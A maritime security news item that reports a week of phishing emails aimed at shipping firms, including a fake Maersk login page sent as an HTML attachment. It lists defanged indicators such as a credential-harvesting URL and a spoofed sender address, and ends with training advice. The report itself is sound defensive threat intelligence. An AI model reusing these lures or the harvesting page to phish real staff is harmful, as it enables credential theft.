Maritime security intelligence firm Dryad Global and cyber partners RedSkyAlliance monitor attempted cyber attacks in the maritime sector, examining how email is used to deceive the recipient and potentially expose the target organizations. The following update regards the period from 23 to 31 May.
The partners remind that, even if attackers can only get 10% of people to open their malicious email attachments, they can send thousands out in a day using similar templates resulting in hundreds of victims per day. They can also automate parts of this process for efficiency. Therefore, it is critical to implement training for all employees to help identify malicious emails/attachments.
Email subject line Motor Vessel (MV) or Motor Tanker (MT) keyword usage is a common lure to entice users in the maritime industry to open emails containing malicious attachments.
23-31 May: Key points
This week, the companies observed a wide variety of maritime-related subject lines, with names including “MV Tanbinh” and “MV Crown Garnet” among others.
In addition, threat actors impersonated Maersk in at least two malicious emails this week. The first attacker used Maersk as an alias, however, the sending email address linked to the malicious email is dvpnvp[at]dvpn[.]gov[.]by. This sending email address belongs to the Department of Veterinary and Food Control of the Republic of Belarus.
Threat actors often impersonate official government agencies to make their malicious emails appear more legitimate.
Attached to the malicious email was an html file titled “Maersk Shipping Document.html.” Antivirus engines have identified this file as JS/Phish.AB38!tr phishing malware. If the target were to open the malicious .html attachment they would be brought to a Maersk login screen with their email address pre-filled in the username field.
Users should always be aware of logging into web pages with pre-filled credential fields.
[smlsubform prepend=”GET THE SAFETY4SEA IN YOUR INBOX!” showname=false emailtxt=”” emailholder=”Enter your email address” showsubmit=true submittxt=”Submit” jsthanks=false thankyou=”Thank you for subscribing to our mailing list”]
Even if a user inputs the incorrect password and clicks the “Continue” button, they are led to a page displaying a warning that the connection is insecure. Once a user clicks “Continue,” they are brought to hxxps://ptmadras[.]com/oso.php which produces a 404 error at this time. Analysts are confident that the threat actors are attempting to steal the password entered by the target.
These analytical results illustrate how a recipient could be fooled into opening an infected email. They also demonstrate how common it is for attackers to specifically target pieces of a company’s supply chain to build up to cyber-attacks on the larger companies,
…Dryad Global said.
Recommendations
The more convincing an email appears, the greater the chance employees will fall for a scam. To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human element as well as organizational workflows and procedures. Therefore, it is imperative to:
- Train all levels of the marine supply chain to realize they are under constant cyber-attack.
- Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
- Provide practical guidance on how to look for a potential phishing attempt.
- Use direct communication to verify emails and supply chain email communication.
- Use Red Sky Alliance RedXray proactive support, our Vessel impersonation information, and use the
- Maritime Black Lists to proactively block cyber attacks from identified malicious actors.